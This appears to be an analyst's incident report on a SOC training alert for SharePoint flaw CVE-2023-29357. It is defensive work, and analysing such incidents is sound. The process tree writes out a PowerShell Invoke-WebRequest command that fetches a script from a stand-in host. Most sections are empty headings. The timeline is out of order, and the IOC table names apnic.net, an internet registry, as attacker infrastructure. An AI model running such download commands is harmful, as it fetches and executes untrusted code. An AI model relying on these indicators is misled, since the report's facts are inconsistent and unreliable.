SOC227 — Microsoft SharePoint Server Elevation of Privilege

Analyst Write-Up · CVE-2023-29357 Investigation

Brandon Love brand
SOC227 — Microsoft SharePoint EoP
CVE-2023-29357 · DFIR / Incident Response Report

1) Executive Summary

On Oct 6, 2023, a suspicious Microsoft SharePoint Server Elevation of Privilege (CVE-2023-29357) was detected on host MS-SharePointServer.
Investigation confirmed the activity was malicious; containment actions prevented further impact.
No lateral movement was observed.


2) Incident Details

Field Description
Incident ID 189
Analyst Brandon Love
Date/Time Detected Oct 6, 2023 – 08:05 PM CST
Severity Critical
Category Privilege Escalation
Detection Source EDR
Business Impact None
Systems Affected MS-SharePoint Server
Users Involved None

3) Timeline of Events (CST)

Time Event
20:05 Detection triggered
09:00 Analyst investigation started
09:20 Root cause identified
09:30 Containment performed
09:45 Incident resolved

4) Technical Analysis

Process Tree

explorer.exe → powershell.exe → Invoke-WebRequest http://example[.]com/file.ps1

File Hashes:

Network Indicators:

Host Artifacts:

MITRE ATT&CK:


5) Containment & Eradication (Checked = Completed)


6) Recovery & Verification


7) Root Cause

The attacker exploited an unpatched instance of Microsoft SharePoint via CVE-2023-29357, enabling elevation of privilege and execution of unauthorized PowerShell commands via the web service context.
This vulnerability allowed the attacker to forge authentication tokens and escalate privileges without valid credentials.


8) Recommendations


9) Indicators of Compromise (IOCs)

Type Value Description
IP 39.91.166.222 Suspected C2
File Hash none Malicious payload
URL http://www.apnic.net Download location
Domain apnic.net Attacker infra

10) Appendices (Evidence)